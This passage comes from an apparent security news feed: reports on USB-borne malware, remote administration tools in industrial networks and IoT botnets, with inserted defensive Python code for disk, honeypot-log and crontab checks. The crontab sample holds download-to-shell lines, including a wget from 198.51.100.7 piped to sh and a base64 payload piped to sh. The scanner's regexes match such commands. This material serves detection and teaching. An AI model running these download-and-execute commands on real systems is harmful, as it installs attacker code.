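    """Run the check against a raw disk image file (size taken from the file)."""
    with open(path, "rb") as f:
        mbr = f.read(SECTOR)
        f.seek(0, 2)
        size = f.tell()
    return assess_usb_image(mbr, size // SECTOR, threshold_mib)


def build_mbr(entries):
    """Constructed test helper: minimal MBR holding the given (type, start, count) entries."""
    mbr = bytearray(SECTOR)
    for i, (ptype, start, count) in enumerate(entries):
        off = PART_TABLE_OFFSET + i * ENTRY_SIZE
        mbr[off + 4] = ptype
        struct.pack_into("<II", mbr, off + 8, start, count)
    mbr[510:512] = MBR_SIGNATURE
    return bytes(mbr)


# Constructed samples: an 8 GiB stick (16,777,216 sectors) with one FAT32 (0x0C)
# partition starting at LBA 2048. The second image reserves 400 MiB at the end.
DISK_SECTORS = 8 * 1024 * 1024 * 1024 // SECTOR
HIDDEN_SECTORS = 400 * 1024 * 1024 // SECTOR
NORMAL_MBR = build_mbr([(0x0C, 2048, DISK_SECTORS - 2048)])
SUSPICIOUS_MBR = build_mbr([(0x0C, 2048, DISK_SECTORS - 2048 - HIDDEN_SECTORS)])

if __name__ == "__main__":
    for name, mbr in (("normal", NORMAL_MBR), ("suspicious", SUSPICIOUS_MBR)):
        r = assess_usb_image(mbr, DISK_SECTORS)
        print(f"{name}: {r['tail_sectors']} sectors ({r['tail_mib']:.0f} MiB) "
              f"unallocated, suspicious={r['suspicious']}")
```

The same comparison can be made by hand from the partition end printed by a partitioning tool against the device's reported capacity; a large gap on a stick that should be fully used by one data partition is the signal.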

    The Stuxnet survivor CVE-2010-2568

    Microsoft fixed the last of the vulnerable LNK code paths in March 2015. However, in 2016, as many as one in four Kaspersky Lab users who encountered an exploit through any attack medium, including web-borne threats, faced an exploit for this vulnerability (although it was overtaken in 2017 by the EternalBlue exploit). CVE-2010-2568 also continues to feature in malware distributed by USB devices and other removable media, where, despite rapidly falling numbers of detections and victims, it still ranks among the top 10 drive root threats detected by KSN.

    Total drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN

    Users with drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN

    If the exploit detections provide an indication of the volume of malware being transmitted via removable media such as USBs, the following illustrate the kind of malware being distributed in this way.

    Malware delivered via removable media

    The top malware spread via removable media has stayed relatively consistent since at least 2016. For example, the family of Windows LNK malware, Trojans containing links for downloading malicious files or paths for launching a malicious executable, has remained among the top three threats spread by removable media. This malware is used by attackers to destroy, block, modify or copy data, or to disrupt the operation of a device or its network. The WinLNK Runner Trojan, which was the top detected USB threat in 2017, is used in worms for launching executable files.

    In 2017, 22.7 million attempted WinLNK.Agent infections were detected, affecting nearly 900,000 users. The estimate for 2018 is around 23 million attacks, hitting just over 700,000 users. This represents a 2% rise in detections and a 20% drop in the number of users targeted year-on-year.

    For the WinLNK Runner Trojan the numbers are expected to fall more sharply – with a 61% drop in detections from 2.75 million in 2017 to an estimated 1 million in 2018; and a decline of 51% in the number of users targeted (from around 920,000 in 2017 to just over 450,000 in 2018).

    Other top malware spread through USB devices includes the Sality virus, first detected in 2003 but heavily modified since; and the Dinihou worm that automatically copies itself onto a USB drive, creating malicious shortcuts (LNKs) that launch the worm as soon as the new victim opens them.

    Miners – rare but persistent

    USB devices are also being used to spread cryptocurrency mining software. This is relatively uncommon, but successful enough for attackers to continue using this method of distribution. According to KSN data, a popular crypto-miner detected in drive roots is Trojan.Win32.Miner.ays/Trojan.Win64.Miner.all, known since 2014.

    Malware in this family secretly uses the processor capacity of the infected computer to generate the cryptocurrency. The Trojan drops the mining application onto the PC, then installs and silently launches the mining software and downloads the parameters that enable it to send the results to an external server controlled by the attacker.

    Kaspersky Lab’s data shows that some of the infections detected in 2018 date back years, indicating a lengthy infection likely to have had a significant negative impact on the processing power of the victim device.

    Detection data for the 32-bit version of Trojan.Win32.Miner.ays is as follows:

    Year                         Detection data for Trojan.Win32.Miner.ays   Unique user count
    2017                         778,620                                     236,000
    2018 (estimate based on H1)  600,698                                     196,866

    Between H1 2017 (136,954 unique users) and H1 2018 (93,433 unique users), there was a fall of 28.13 percentage points in the number of people affected by the 32-bit version of the miner.

    The other version, Trojan.Win64.Miner.all, saw an expected surge in the first year of detection, after which the number of users hit has levelled out to a steady growth rate of around one-sixth per year. This small but steady growth rate can also be seen when the number of users targeted with this mining malware is compared against the overall number of users hit by removable media threats. This shows that around one in 10 users hit with a removable media threat in 2018 will be targeted with this miner, about a two-fold rise in two years.

    These results suggest that propagation via removable media works well for this threat.

    Detection data for Trojan.Win64.Miner.all is as follows:

    Year                         Detection data for Trojan.Win64.Miner.all   Unique user count   YoY change   Unique user count as share of all users hit with a removable media threat
    2016                         4,211,246                                   245,702             +70.15%      4.2%
    2017                         4,214,785                                   301,178             +18.42%      6.7%
    2018 (estimate based on H1)  4,209,958                                   362,242             +16.42%      9.2%

    Dark Tequila – advanced banking malware

    In August 2018, Kaspersky Lab researchers reported on a sophisticated cyber operation code-named Dark Tequila that has been targeting users in Mexico for at least the last five years, stealing bank credentials and personal and corporate data with malware that can move laterally through the victim computer while offline.

    According to Kaspersky Lab researchers, the malicious code spreads through infected USB devices and spear phishing and includes features to evade detection. The threat actor behind Dark Tequila is believed to be Spanish-speaking and Latin American in origin.

    Target geography

    Emerging markets appear to be the most vulnerable to infection by removable media.

    The annual numbers for 2017 show that in many such countries, around two-thirds of users experienced a ‘local’ incident, which includes drive root malware infections from removable media, compared to less than one in four in developed economies. These figures appear to be remaining consistent into 2018.

    For the LNK exploit spread through removable media, the most affected countries in 2018 to date are Vietnam (18.8% of users affected), Algeria (11.2%) and India (10.9%), with infections also found in the rest of Asia, Russia and Brazil, among others, and a few hits in a number of European countries (Spain, Germany, France, the UK and Italy), the U.S. and Japan.

    Share of users affected by an exploit for CVE-2010-2568 through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included)

    The reach is broader for the miner. Trojan.Win32.Miner.ays/Trojan.Win64.Miner.all detections are mainly found in India (23.7%), Russia (18.45% – likely to be impacted by a larger customer base) and Kazakhstan (14.38%), with infections also found in other parts of Asia and Africa, and a few hits in several European countries (the UK, Germany, the Netherlands, Switzerland, Spain, Belgium, Austria, Italy, Denmark and Sweden), the U.S., Canada and Japan.

    Share of users affected by the bitcoin cryptocurrency miner through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included)

    Conclusion and advice

    The main purpose of this short paper is to raise awareness of a threat that consumers and businesses may underestimate.

    USB drives offer many advantages: they are compact and handy, and a great brand asset, but the devices themselves, the data stored on them and the computers they are plugged into are all potentially vulnerable to cyberthreats if left unprotected.

    Fortunately, there are some effective steps consumers and organizations can take to secure the use of USB devices.

    Advice for all USB users:

    • Be careful about the devices you connect to your computer – do you know where it came from?
    • Invest in encrypted USB devices from trusted brands – this way you know your data is safe even if you lose the device
    • Make sure all data stored on the USB is also encrypted
    • Have a security solution in place that checks all removable media for malware before they are connected to the network – even trusted brands can be compromised through their supply chain

    Additional advice for businesses:

    • Manage the use of USB devices: define which USB devices can be used, by whom and for what
    • Educate employees on safe USB practices – particularly if they are moving the device between a home computer and a work device
    • Don’t leave USBs lying around or on display

    Kaspersky Lab’s security solutions, such as Kaspersky Endpoint Security for Windows, provide security and encryption for all removable media including USB devices.

    Secure Your Home Wi-Fi Network

    SANS Tip of the Day - Tue, 09/25/2018 - 01:00
    Be aware of all the devices connected to your home network, including baby monitors, gaming consoles, TVs, appliances or even your car. Ensure all those devices are protected by a strong password and/or are running the latest version of their operating system.

    Kids and Family Members

    SANS Tip of the Day - Fri, 09/21/2018 - 01:00
    If you have children visiting or staying with family members (such as grandparents), make sure the family members know your rules concerning technology that your kids must follow. Just because your kids leave the house does not mean the rules about what they can do online change.

    Threats posed by using RATs in ICS

    Malware Alerts - Thu, 09/20/2018 - 06:00

    While conducting audits, penetration tests and incident investigations, we have often come across legitimate remote administration tools (RAT) for PCs installed on operational technology (OT) networks of industrial enterprises. In a number of incidents that we have investigated, threat actors had used RATs to attack industrial organizations. In some cases, the attackers had stealthily installed RATs on victim organizations’ computers, while in other cases, they had been able to use the RATs that were installed in the organization at the time of the attacks. These observations prompted us to analyze the scope of the threat, including the incidence of RATs on industrial networks and the reasons for using them.

    Methodology

    The statistical data presented in this paper was collected using the Kaspersky Security Network (KSN) from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. This group includes Windows computers that perform one or several of the following functions:

    • supervisory control and data acquisition (SCADA) servers;
    • data storage servers (Historian);
    • data gateways (OPC);
    • stationary workstations of engineers and operators;
    • mobile workstations of engineers and operators;
    • Human Machine Interface (HMI).

    As part of our research, we considered and analyzed all popular RATs for Windows, with the exception of Remote Desktop, which is part of the Windows operating system. Our research into this RAT is ongoing and will be presented in the next paper of the series.

    The use of RATs in ICS

    According to KSN data, in the first half of 2018, legitimate RATs (programs categorized as not-a-virus: RemoteAdmin) were installed and used on one ICS computer in three.

    Percentage of ICS computers that have RATs legitimately installed on them

    The statistics support our observations: RATs are indeed often used on OT networks of industrial enterprises. We believe this could be due to attempts to reduce costs associated with maintaining ICS and minimize the response time in the event of malfunction.

    As we were able to find out, remote access to computers on the OT network is not restricted to administrators and engineers inside the enterprise network’s perimeter. It can also be made available via the internet to users outside the enterprise network perimeter. Such users can include representatives of third-party enterprises – employees of system integrators or ICS vendors, who use RATs for diagnostics, maintenance and to address any ICS malfunctions. As our industrial network security audits have shown, such access is often poorly supervised by the enterprise’s responsible employees, while remote users connecting to the OT network often have excessive rights, such as local administrator privileges, which is obviously a serious issue in terms of ensuring the information security of industrial automation systems.

    From interviews with engineers and operators of various industrial systems that we have audited, and based on an analysis of ICS user documentation, we have determined that RATs are most commonly used on industrial networks according to the following scenarios:

    1. To control/monitor HMI from an operator workstation (including displaying information on a large screen);
    2. To control/maintain HMI from an engineering workstation;
    3. To control SCADA from an operator workstation;
    4. To provide SCADA maintenance from an engineering workstation or a computer of a contractor/vendor (from an external network);
    5. To connect multiple operators to one operator workstation (thin client-like architecture used to save money on licenses for the software used on operator workstations);
    6. To connect to a computer on the office network from the OT network via HMI and perform various tasks on that computer (access email, access the internet, work with office documents, etc.).

    Some of the scenarios listed above indicate that the use of RATs on the OT network can be explained by operational requirements, which means that giving up the use of RATs would unavoidably entail modifications to work processes. At the same time, it is important to realize that an attack on a poorly protected RAT could easily cause disruptions to the industrial process and any decisions on using RATs on the OT network should be made with this in mind. Tight controls on the use of RATs on the OT network would help to reduce the attack surface and the risk of infection for systems administered remotely.

    TOP 20 countries by percentage of ICS computers on which RATs were used at least once during the first half of 2018 (to all ICS computers in each country)

    Scenarios of RAT installation on ICS computers

    According to our research, there are three most common scenarios of RAT installation on ICS computers:

    1. Installation of ICS software distribution packages that include RATs (using separate distribution packages or ICS software installers). RATs included in ICS software distribution packages make up 18.6% of all RATs we have identified on ICS computers protected by Kaspersky Lab products.

    Percentage of RATs bundled with ICS products to all RATs found on ICS computers

    2. Deliberate installation of RATs by personnel or suppliers – network administrators, engineers, operators, or integrator companies. We do not undertake to judge whether these installations are legitimate. Based on our experience of industrial network audits and incident investigation, we can state that many such installations do not comply with the organization’s information security policy and some are installed without the knowledge of respective enterprises’ responsible employees.
    3. Stealthy installation of RATs by malware. An example of this is a recent attack that we have investigated (see below).

    RAT-related threats to ICS

    Threats associated with the use of RATs on industrial networks are not always obvious, nor are the reasons for which RATs are used.

    Most of the RATs we have identified on industrial systems have the following characteristics that significantly reduce the security level of the host system:

    • Elevated privileges – the server part of a RAT is often executed as a service with system privileges, i.e., NT SYSTEM;
    • No support for restricting local access to the system / client activity;
    • Single-factor authentication;
    • No logging of client activity;
    • Vulnerabilities (our report on zero-day vulnerabilities identified in popular RAT systems that are used, among other applications, in products by many ICS vendors, will be published by the end of the year);
    • The use of relay servers (for reverse connections) that enable RATs to bypass NAT and firewall restrictions on the network perimeter.

    The most critical RAT-related problem is the use of elevated privileges and the absence of any means to limit these privileges (or to restrict a remote user’s local access). In practice, this means that if attackers (or malware) gain access to a remote user’s computer, steal authentication data (login/password), hijack an active remote administration session or successfully attack a vulnerability in the RAT’s server part, they will gain unrestricted control of the ICS system. By using relay servers for reverse connections, attackers can also connect to these RATs from anywhere in the world.

    There are also other issues that affect RATs built into ICS software distribution packages:

    • RAT components and distribution packages are rarely updated (even if new versions of ICS distribution packages are released). This makes them more likely to contain vulnerabilities;
    • In the vast majority of cases, the default password is used – it is either hardcoded into the RAT by the ICS software vendor or specified in the documentation as “recommended”.

    RATs are legitimate software tools that are often used on industrial networks, which means it can be extremely difficult to distinguish attacks involving RATs from legitimate activity. In addition, since the information security service and other employees responsible for ICS security are often unaware that a RAT is installed, the configuration of RATs is in most cases not analyzed when auditing the security of an industrial network. This makes it particularly important to control by whom, when and for what purposes RATs are used on the industrial network and to ensure that it is completely impossible to use RATs without the knowledge of employees responsible for the OT network’s information security.

    Attacks of threat actors involving RATs

    Everything written above applies to potential threats associated with the use of RATs.

    Based on our analysis of KSN statistics, we were able to identify a number of attacks and malware infection attempts involving RATs installed on ICS computers. In most cases, attacks were based on the following scenarios (in the descending order of attack incidence):

    1. A brute force network attack from the local network or the internet designed to crack logins/passwords;
    2. An attacker or malware using a RAT to download and execute malware using stolen or cracked authentication credentials;
    3. A remote user (probably a legitimate user deceived by attackers) using a RAT to download a Trojan to an ICS computer and then executing it; the Trojan can be disguised as an office document, non-industrial software (a game, multimedia software, etc.), a crack/keygen for office, application or industrial software, etc.;
    4. A network attack from the local network or the internet on the server part of the RAT using exploits.

    Brute force type network attacks (designed to crack logins/passwords) are the most common: their implementation does not require any special knowledge or skills and the software used in such attacks is publicly available.

    It cannot be determined based on available data who connects to a RAT’s server part installed on an ICS computer – a legitimate user, an attacker or malware – or why. Consequently, we can only guess whether this activity represents a targeted attack, sabotage attempts or a client’s error.

    Network attacks from the internet were most probably conducted by threat actors using malware, penetration testing tools or botnets.

    Network attacks from the local network could indicate the presence of attackers (possibly including an insider) on the network. Another possibility is that there is a compromised computer on the local network that is either infected with malware or is used by the attacker as a point of presence (if the authentication credentials were compromised earlier).

    Attacks on industrial enterprises using RMS and TeamViewer

    In the first half of 2018, Kaspersky Lab ICS CERT identified a new wave of phishing emails disguised as legitimate commercial offers. Although the attacks targeted primarily industrial companies within the territory of Russia, the same tactics and tools can be used in attacks on industrial companies in any country of the world.

    The malware used in these attacks installs legitimate remote administration software on the system — TeamViewer or Remote Manipulator System/Remote Utilities (RMS). In both cases, a system DLL is replaced with a malicious library to inject malicious code into a legitimate program’s process. This provides the attackers with remote control of the infected systems. Various techniques are used to mask the infection and the activity of the software installed on the system.

    If necessary, the attackers download an additional malware pack to the system, which is specifically tailored to the attack on each individual victim. This set of malware may contain spyware, additional remote administration tools that extend the threat actor’s control of infected systems, malware to exploit vulnerabilities in the operating system and application software, as well as the Mimikatz utility, which makes it possible to obtain account data for Windows accounts.

    According to available data, the attackers’ main goal is to steal money from victim organizations’ accounts, but possible attack scenarios are not limited to the theft of funds. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious surveillance of the victim companies’ employees, and record audio and video using devices connected to infected machines. Clearly, on top of the financial losses, these attacks result in leaks of victim organizations’ sensitive data.

    Multiple attacks on an auto manufacturer

    A characteristic example of attacks based on the second scenario was provided by attacks on the industrial network of a motor vehicle manufacturing and service company, in particular, on computers designed to diagnose the engines and onboard systems of trucks and heavy-duty vehicles. Multiple attempts to conduct such attacks were blocked by Kaspersky Lab products.

    A RAT was installed and intermittently used on at least one of the computers in the company’s industrial network. Starting in late 2017, numerous attempts to launch various malicious programs using the RAT were blocked on the computer. Infection attempts were made regularly over a period of several months – 2-3 times a week, at different times of the day. Based in part on other indirect indicators, we believe that RAT authentication data was compromised and used by attackers (or malware) to attack the enterprise’s computers over the internet.

    After gaining access to the potential victim’s infrastructure via the RAT, the attackers kept trying to choose a malicious packer that would enable them to evade antivirus protection.

    The blocked programs included modifications of the malware detected by Kaspersky Lab products as Net-Worm.Win32.Agent.pm. When launched, this worm immediately begins to proliferate on the local network using exploits for the MS17-010 vulnerabilities – the same ones that were published by ShadowBrokers in the spring of 2017 and were used in attacks by the infamous WannaCry and ExPetr cryptors.

    The Nymaim Trojan family was also blocked. Representatives of this family are often used to download modifications of botnet agents from the Necurs family, which in turn have often been used to infect computers with ransomware from the Locky family.

    Conclusion

    Remote administration tools are widely used on industrial networks for ICS monitoring, control and maintenance. The ability to manipulate the ICS remotely significantly reduces maintenance costs, but at the same time, uncontrolled remote access, the inability to provide 100% verification of the remote client’s legitimacy, and the vulnerabilities in RAT code and configuration significantly increase the attack surface. At the same time, RATs, along with other legitimate tools, are increasingly used by attackers to mask malicious activity and make attribution more difficult.

    To reduce the risk of cyberattacks involving RATs, we recommend the following high-priority measures:

    • Audit the use of application and system remote administration tools on the industrial network, such as VNC, RDP, TeamViewer, and RMS / Remote Utilities. Remove all remote administration tools that are not required by the industrial process.
    • Conduct an audit and disable remote administration tools which came with ICS software (refer to the relevant software documentation for detailed instructions), provided that they are not required by the industrial process.
    • Closely monitor and log events for each remote control session required by the industrial process; remote access should be disabled by default and enabled only upon request and only for limited periods of time.

    New trends in the world of IoT threats

    Malware Alerts - Tue, 09/18/2018 - 06:00

    Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.

    We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.


    [Chart] Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018.

    One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypots as all other types combined.

    Service | % of attacks
    Telnet  | 75.40%
    SSH     | 11.59%
    Other   | 13.01%

    When it came to downloading malware onto IoT devices, cybercriminals’ preferred option was one of the Mirai family (20.9%).

    #  | Downloaded malware                | % of attacks
    1  | Backdoor.Linux.Mirai.c            | 15.97%
    2  | Trojan-Downloader.Linux.Hajime.a  | 5.89%
    3  | Trojan-Downloader.Linux.NyaDrop.b | 3.34%
    4  | Backdoor.Linux.Mirai.b            | 2.72%
    5  | Backdoor.Linux.Mirai.ba           | 1.94%
    6  | Trojan-Downloader.Shell.Agent.p   | 0.38%
    7  | Trojan-Downloader.Shell.Agent.as  | 0.27%
    8  | Backdoor.Linux.Mirai.n            | 0.27%
    9  | Backdoor.Linux.Gafgyt.ba          | 0.24%
    10 | Backdoor.Linux.Gafgyt.af          | 0.20%

    Top 10 malware downloaded onto infected IoT devices following a successful Telnet password crack

    And here are the Top 10 countries from which our traps were hit by Telnet password attacks:


    [Chart] Geographical distribution of the number of infected devices, Q2 2018.

    As we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%). Overall, for the period January 1 – July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.
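    As an added illustration, not part of the original report, the following Python reproduces the kind of analysis behind these honeypot figures on constructed log lines: the share of events per service, source IPs that brute-force logins, and the "successful crack followed by a payload download" sequence behind the Top 10 table above. The log format, IP addresses, URL and thresholds are the example's own assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta
# Constructed honeypot log lines (not real capture data): time, service, source IP, event, detail.
SAMPLE_LOG = """\
2018-06-01T10:00:01 telnet 203.0.113.5 login_failed user=root
2018-06-01T10:00:02 telnet 203.0.113.5 login_failed user=admin
2018-06-01T10:00:03 telnet 203.0.113.5 login_failed user=support
2018-06-01T10:00:04 telnet 203.0.113.5 login_failed user=root
2018-06-01T10:00:05 telnet 203.0.113.5 login_ok user=root
2018-06-01T10:00:06 telnet 203.0.113.5 download url=http://198.51.100.7/bot.x86
2018-06-01T10:05:00 ssh 198.51.100.9 login_failed user=pi
2018-06-01T10:05:30 ssh 198.51.100.9 login_failed user=pi
"""

def parse_log(text):
    """One dict per well-formed line (time service ip event [detail]); other lines are skipped."""
    events = []
    for parts in (line.split(" ", 4) for line in text.splitlines()):
        if len(parts) >= 4:
            events.append({"ts": datetime.fromisoformat(parts[0]), "service": parts[1],
                           "ip": parts[2], "event": parts[3],
                           "detail": parts[4] if len(parts) > 4 else ""})
    return sorted(events, key=lambda e: e["ts"])

def service_share(events):
    """Percentage of logged events per service, like the 'service / % of attacks' table."""
    counts = Counter(e["service"] for e in events)
    return {svc: round(100.0 * n / len(events), 2) for svc, n in counts.items()}

def find_bruteforce(events, threshold=4, window=timedelta(minutes=1)):
    """Source IPs with `threshold` consecutive failed logins inside one `window`."""
    fails = defaultdict(list)
    for e in events:                         # events are time-ordered by parse_log
        if e["event"] == "login_failed":
            fails[e["ip"]].append(e["ts"])
    flagged = set()
    for ip, times in fails.items():
        for end in range(threshold - 1, len(times)):
            if times[end] - times[end - threshold + 1] <= window:
                flagged.add(ip)
                break
    return flagged

def find_post_crack_downloads(events):
    """IPs that failed, then logged in, then fetched a file. Returns {ip: url}."""
    stage, hits = defaultdict(int), {}
    for e in events:
        if e["event"] == "login_failed" and stage[e["ip"]] == 0:
            stage[e["ip"]] = 1
        elif e["event"] == "login_ok" and stage[e["ip"]] == 1:
            stage[e["ip"]] = 2
        elif e["event"] == "download" and stage[e["ip"]] == 2:
            hits[e["ip"]] = e["detail"].partition("=")[2]
    return hits
```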

    Since some smart device owners change the default Telnet password to one that is more complex, and many gadgets don’t support this protocol at all, cybercriminals are constantly on the lookout for new ways of infection. This is stimulated by the high competition between virus writers, which has led to password bruteforce attacks becoming less effective: in the event of a successful crack, the device password is changed and access to Telnet is blocked.

    An example of the use of “alternative technology” is the Reaper botnet, whose assets at end-2017 numbered about 2 million IoT devices. Instead of bruteforcing Telnet passwords, this botnet exploited known software vulnerabilities:

    Advantages of this distribution method over password cracking:

    • Infection occurs much faster
    • It is much harder to patch a software vulnerability than change a password or disable/block the service

    Although this method is more difficult to implement, it found favor with many virus writers, and it wasn’t long before new Trojans exploiting known vulnerabilities in smart device software started appearing.

    New attacks, old malware

    To see which vulnerabilities are targeted by malware, we analyzed data on attempts to connect to various ports on our traps. This is the picture that emerged for Q2 2018:

    Service | Port | % of attacks | Attack vector | Malware families
    Telnet | 23, 2323 | 82.26% | Bruteforce | Mirai, Gafgyt
    SSH | 22 | 11.51% | Bruteforce | Mirai, Gafgyt
    Samba | 445 | 2.78% | EternalBlue, EternalRed, CVE-2018-7445 | –
    tr-069 | 7547 | 0.77% | RCE in TR-069 implementation | Mirai, Hajime
    HTTP | 80 | 0.76% | Attempts to exploit vulnerabilities in a web server or crack an admin console password | –
    winbox (RouterOS) | 8291 | 0.71% | Used for RouterOS (MikroTik) authentication and WinBox-based attacks | Hajime
    Mikrotik http | 8080 | 0.23% | RCE in MikroTik RouterOS < 6.38.5 Chimay-Red | Hajime
    MSSQL | 1433 | 0.21% | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | –
    GoAhead httpd | 81 | 0.16% | RCE in GoAhead IP cameras | Persirai, Gafgyt
    Mikrotik http | 8081 | 0.15% | Chimay-Red | Hajime
    Ethereum JSON-RPC | 8545 | 0.15% | Authorization bypass (CVE-2017-12113) |
    RDP | 3389 | 0.12% | Bruteforce | –
    XionMai uc-httpd | 8000 | 0.09% | Buffer overflow (CVE-2018-10088) in XionMai uc-httpd 1.0.0 (some Chinese-made devices) | Satori
    MySQL | 3306 | 0.08% | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | –

    The vast majority of attacks still come from Telnet and SSH password bruteforcing. The third most common are attacks against the SMB service, which provides remote access to files. We haven’t seen IoT malware attacking this service yet. However, some versions of it contain serious known vulnerabilities such as EternalBlue (Windows) and EternalRed (Linux), which were used, for instance, to distribute the infamous Trojan ransomware WannaCry and the Monero cryptocurrency miner EternalMiner.

    Here’s the breakdown of infected IoT devices that attacked our honeypots in Q2 2018:

    Device      | % of infected devices
    MikroTik    | 37.23%
    TP-Link     | 9.07%
    SonicWall   | 3.74%
    AV tech     | 3.17%
    Vigor       | 3.15%
    Ubiquiti    | 2.80%
    D-Link      | 2.49%
    Cisco       | 1.40%
    AirTies     | 1.25%
    Cyberoam    | 1.13%
    HikVision   | 1.11%
    ZTE         | 0.88%
    Miele       | 0.68%
    Unknown DVR | 31.91%

    As can be seen, MikroTik devices running under RouterOS are way out in front. The reason appears to be the Chimay-Red vulnerability. What’s interesting is that our honeypot attackers included 33 Miele dishwashers (0.68% of the total number of attacks). Most likely they were infected through the known (since March 2017) CVE-2017-7240 vulnerability in PST10 WebServer, which is used in their firmware.

    Port 7547

    Attacks against remote device management (TR-069 specification) on port 7547 are highly common. According to Shodan, there are more than 40 million devices in the world with this port open. And that’s despite the vulnerability recently causing the infection of a million Deutsche Telekom routers, not to mention helping to spread the Mirai and Hajime malware families.

    Another type of attack exploits the Chimay-Red vulnerability in MikroTik routers running under RouterOS versions below 6.38.4. In March 2018, it played an active part in distributing Hajime.

    IP cameras

    IP cameras are also on the cybercriminal radar. In March 2017, several major vulnerabilities were detected in the software of GoAhead devices, and a month after information about it was published, there appeared new versions of the Gafgyt and Persirai Trojans exploiting these vulnerabilities. Just one week after these malicious programs were actively distributed, the number of infected devices climbed to 57,000.

    On June 8, 2018, a proof-of-concept was published for the CVE-2018-10088 vulnerability in the XionMai uc-httpd web server, used in some Chinese-made smart devices (for example, KKMoon DVRs). The next day, the number of logged attempts to locate devices using this web server more than tripled. The culprit for this spike in activity was the Satori Trojan, known for previously attacking GPON routers.

    New malware and threats to end users

    DDoS attacks

    As before, the primary purpose of IoT malware deployment is to perpetrate DDoS attacks. Infected smart devices become part of a botnet that attacks a specific address on command, depriving the host of the ability to correctly handle requests from real users. Such attacks are still deployed by Trojans from the Mirai family and its clones, in particular, Hajime.

    This is perhaps the least harmful scenario for the end user. The worst (and very unlikely) thing that can happen to the owner of the infected device is being blocked by their ISP. And the device can often be “cured” with a simple reboot.

    Cryptocurrency mining

    Another type of payload is linked to cryptocurrencies. For instance, IoT malware can install a miner on an infected device. But given the low processing power of smart devices, the feasibility of such attacks remains in doubt, even despite their potentially large number.

    A more devious and doable method of getting a couple of cryptocoins was invented by the creators of the Satori Trojan. Here, the victim IoT device acts as a kind of key that opens access to a high-performance PC:

    • At the first stage, the attackers try to infect as many routers as possible using known vulnerabilities, in particular:
      • CVE-2014-8361 – RCE in the miniigd SOAP service in Realtek SDK
      • CVE-2017-17215 – RCE in the firmware of Huawei HG532 routers
      • CVE-2018-10561, CVE-2018-10562 – authorization bypass and execution of arbitrary commands on Dasan GPON routers
      • CVE-2018-10088 – buffer overflow in XiongMai uc-httpd 1.0.0 used in the firmware of some routers and other smart devices made by some Chinese manufacturers
    • Using compromised routers and the CVE-2018-1000049 vulnerability in the Claymore Ethereum miner remote management tool, they substitute the wallet address for their own.

    Data theft

    The VPNFilter Trojan, detected in May 2018, pursues other goals, above all intercepting infected device traffic, extracting important data from it (user names, passwords, etc.), and sending it to the cybercriminals’ server. Here are the main features of VPNFilter:

    • Modular architecture. The malware creators can fit it out with new functions on the fly. For instance, in early June 2018 a new module was detected able to inject JavaScript code into intercepted web pages.
    • Reboot resistant. The Trojan writes itself to the standard Linux crontab job scheduler, and can also modify the configuration settings in the non-volatile memory (NVRAM) of the device.
    • Uses Tor for communication with C&C.
    • Able to self-destruct and disable the device. On receiving the command, the Trojan deletes itself, overwrites the critical part of the firmware with garbage data, and then reboots the device.
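    As an added example, not part of the original report, here is a small check for the crontab-based reboot persistence described above: it scans a constructed crontab for entries that run from world-writable or hidden paths, or that download or decode content straight into a shell. The crontab contents, the indicator patterns and the directory list are the example's own assumptions.

```python
import re

# Constructed crontab text for a Linux-based router (not a real capture); the
# suspicious entries mimic the reboot-persistence pattern, the rest is routine.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /var/tmp/.x/vpnf -c /var/tmp/.x/conf
@reboot wget -q -O - http://198.51.100.7/s | sh
15 * * * * root /usr/bin/ntpdate pool.ntp.org
*/10 * * * * echo IyEvYmluL3No | base64 -d | sh
"""

WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/run/")   # assumed list
FETCH_EXEC = re.compile(r"\b(wget|curl|tftp)\b.*\|\s*(sh|bash|ash)\b")
DECODE_EXEC = re.compile(r"\bbase64\s+(-d|--decode)\b.*\|\s*(sh|bash|ash)\b")
HIDDEN_PATH = re.compile(r"/\.[^/\s]+")      # a path component starting with '.'

def _command_part(line):
    """Strip the schedule fields; handles '@reboot'-style and five-field entries."""
    if line.startswith("@"):
        return line.split(None, 1)[1] if " " in line else ""
    fields = line.split(None, 5)
    return fields[5] if len(fields) == 6 else ""

def scan_crontab(text):
    """Return (line_number, reason, command) for every entry that looks like
    malware persistence rather than routine maintenance."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        cmd = _command_part(line)
        reasons = []
        if any(d in cmd for d in WRITABLE_DIRS):
            reasons.append("executes from a world-writable directory")
        if HIDDEN_PATH.search(cmd):
            reasons.append("uses a hidden (dot-prefixed) path")
        if FETCH_EXEC.search(cmd):
            reasons.append("downloads and pipes content straight into a shell")
        if DECODE_EXEC.search(cmd):
            reasons.append("decodes an embedded payload into a shell")
        findings.extend((n, r, cmd) for r in reasons)
    return findings
```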

    The Trojan’s distribution method is still unknown: its code contains no self-propagation mechanisms. However, we are inclined to believe that it exploits known vulnerabilities in device software for infection purposes.

